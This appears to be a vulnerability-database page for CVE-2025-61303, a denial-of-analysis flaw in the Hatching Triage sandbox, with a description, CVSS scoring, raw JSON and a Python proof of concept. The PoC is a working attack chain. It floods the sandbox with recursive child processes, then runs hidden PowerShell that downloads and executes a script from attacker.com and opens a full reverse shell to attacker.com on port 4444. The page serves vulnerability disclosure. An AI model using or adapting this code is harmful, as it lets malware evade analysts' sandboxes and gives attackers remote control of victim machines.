Security Vulnerability Report
CVE-2025-61303 CVSS 9.8 CRITICAL

Published: 2025-10-20 21:15:38
Last Modified: 2026-04-15 00:35:42

Description

Hatching Triage Sandbox Windows 10 build 2004 (2025-08-14) and Windows 10 LTSC 2021 (2025-08-14) contain a vulnerability in the Windows behavioral analysis engine that allows a submitted malware sample to evade detection and cause denial-of-analysis. The vulnerability is triggered when a sample recursively spawns a large number of child processes, generating high log volume and exhausting system resources. As a result, key malicious behavior, including PowerShell execution and reverse shell activity, may not be recorded or reported, misleading analysts and compromising both the integrity and the availability of the sandboxed analysis results.

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No CPE configuration data is recorded for this CVE. Affected products named in the description:

Hatching Triage Sandbox Windows 10 build 2004 (2025-08-14)
Hatching Triage Sandbox Windows 10 LTSC 2021 (2025-08-14)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-61303 PoC - Hatching Triage Sandbox Denial-of-Analysis
# This PoC demonstrates how to evade Hatching Triage Sandbox by exhausting
# the behavioral analysis engine through recursive child process spawning.

import subprocess
import sys
import os
import time


def spawn_child():
    """
    Recursively spawn child processes to exhaust sandbox resources.
    Each child process will trigger API hooks in the sandbox, generating
    massive log volumes and consuming system resources.
    """
    try:
        # Use cmd.exe to recursively spawn more processes
        # The /c flag executes the command and terminates
        subprocess.Popen(
            ['cmd.exe', '/c', sys.executable, __file__],
            creationflags=subprocess.CREATE_NEW_CONSOLE
        )
    except Exception:
        pass


def execute_malicious_payload():
    """
    After exhausting sandbox resources, execute the actual malicious payload.
    These actions will NOT be recorded by the sandbox due to resource exhaustion.
    """
    # Example: Execute PowerShell command (will not be logged)
    subprocess.Popen(
        ['powershell.exe', '-NoProfile', '-WindowStyle', 'Hidden', '-Command',
         'Invoke-WebRequest -Uri http://attacker.com/payload.ps1 -OutFile $env:TEMP\payload.ps1; & $env:TEMP\payload.ps1'],
        creationflags=subprocess.CREATE_NO_WINDOW
    )

    # Example: Establish reverse shell (will not be logged)
    subprocess.Popen(
        ['powershell.exe', '-NoProfile', '-WindowStyle', 'Hidden', '-Command',
         '$client = New-Object System.Net.Sockets.TCPClient("attacker.com",4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){; $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); $sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + "PS " + (pwd).Path + "> "; $x = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($x,0,$x.Length); $stream.Flush()}'],
        creationflags=subprocess.CREATE_NO_WINDOW
    )


def main():
    # Phase 1: Exhaust sandbox resources by spawning many child processes
    max_processes = 500  # Adjust based on target system
    for i in range(max_processes):
        spawn_child()

    # Phase 2: Wait for sandbox to be overwhelmed
    time.sleep(5)

    # Phase 3: Execute actual malicious payload (undetected)
    execute_malicious_payload()


if __name__ == "__main__":
    main()

References

https://github.com/eGkritsis/CVE-2025-61303
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-61303",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-20T21:15:38.330",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Hatching Triage Sandbox Windows 10 build 2004 (2025-08-14) and Windows 10 LTSC 2021(2025-08-14) contains a vulnerability in its Windows behavioral analysis engine that allows a submitted malware sample to evade detection and cause denial-of-analysis. The vulnerability is triggered when a sample recursively spawns a large number of child processes, generating high log volume and exhausting system resources. As a result, key malicious behavior, including PowerShell execution and reverse shell activity, may not be recorded or reported, misleading analysts and compromising the integrity and availability of sandboxed analysis results."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-400"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/eGkritsis/CVE-2025-61303",
        "source": "[email protected]"
      }
    ]
  }
}